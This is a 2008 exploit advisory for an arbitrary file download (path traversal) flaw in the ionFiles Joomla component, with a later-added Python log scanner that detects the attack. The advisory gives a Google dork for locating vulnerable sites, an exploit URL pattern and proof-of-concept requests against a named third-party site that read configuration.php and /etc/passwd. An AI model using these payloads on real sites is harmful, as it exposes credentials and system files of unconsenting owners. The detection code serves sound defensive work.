[o]------------------------------------------------------------------------------------[x]
|                                                                                        |
|                         Arbitrary File Download Vulnerability                          |
|                                                                                        |
[o]------------------------------------------------------------------------------------[o]
| Software : ionFiles 4.4.2 Component for Joomla! CMS                                    |
| Vendor   : http://forum.codecall.net/                                                  |
| Date     : 23 October 2008                                                             |
| Author   : Vrs-hCk                                                                     |
| Contact  : d00r[at]telkom[dot]net                                                      |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_ionfiles

[»] Vulnerable

    ./download.php

    Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[»] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[»] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

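The download.php lines quoted above hand $_GET['file'] straight to the file-serving code, so the defender-side counterpart of this advisory is a containment check on the requested path plus a sweep of web server logs for requests that fail it. The Python below is an added example, not code from the advisory or from the ionFiles component: it scans constructed Common Log Format lines (the IPs, timestamps and file names are made up) for requests to com_ionfiles/download.php whose file parameter escapes the download directory; the function and variable names are assumptions of this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlparse
# Constructed sample access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Oct/2008:10:01:02 +0000] "GET /components/com_ionfiles/download.php?file=reports/q3.pdf&download=1 HTTP/1.1" 200 48213
192.0.2.11 - - [23/Oct/2008:10:01:09 +0000] "GET /components/com_ionfiles/download.php?file=../../configuration.php&download=1 HTTP/1.1" 200 2931
192.0.2.12 - - [23/Oct/2008:10:02:44 +0000] "GET /components/com_ionfiles/download.php?file=..%2F..%2F..%2Fetc%2Fpasswd&download=1 HTTP/1.1" 200 1822
192.0.2.13 - - [23/Oct/2008:10:03:01 +0000] "GET /components/com_ionfiles/download.php?file=reports/../reports/q3.pdf&download=1 HTTP/1.1" 200 48213
192.0.2.14 - - [23/Oct/2008:10:03:30 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000
"""

# Fields needed from each log line: client IP, timestamp, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')
VULN_SCRIPT = "/com_ionfiles/download.php"


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, then unify separators."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def escapes_root(file_param: str) -> bool:
    """True if the requested path would leave the download directory; a fixed
    download.php must apply this same containment test before opening the file."""
    path = canonicalize(file_param)
    if path.startswith("/"):  # absolute path request
        return True
    normalized = posixpath.normpath(path)  # "a/../b" -> "b"; "../x" stays "../x"
    return normalized == ".." or normalized.startswith("../")


def scan_log(text: str) -> list[dict]:
    """One record per request that abuses the ionFiles 'file' parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        url = urlparse(m["target"]) if m else None
        if url is None or not url.path.endswith(VULN_SCRIPT):
            continue
        for requested in parse_qs(url.query).get("file", []):
            if escapes_root(requested):
                hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                             "file": canonicalize(requested)})
    return hits
```

A 200 status on a flagged request means the server actually returned the file, which is what distinguishes a successful disclosure from a blocked probe when triaging the hits.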
[o]------------------------------------------------------------------------------------[x]
|                                         Greetz                                         |
[o]------------------------------------------------------------------------------------[o]
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org           |
| Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,            |
| Daus, Rijal, Andrei, Toyong, and friends ... Very Indonesian xixixix ... :))           |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-22]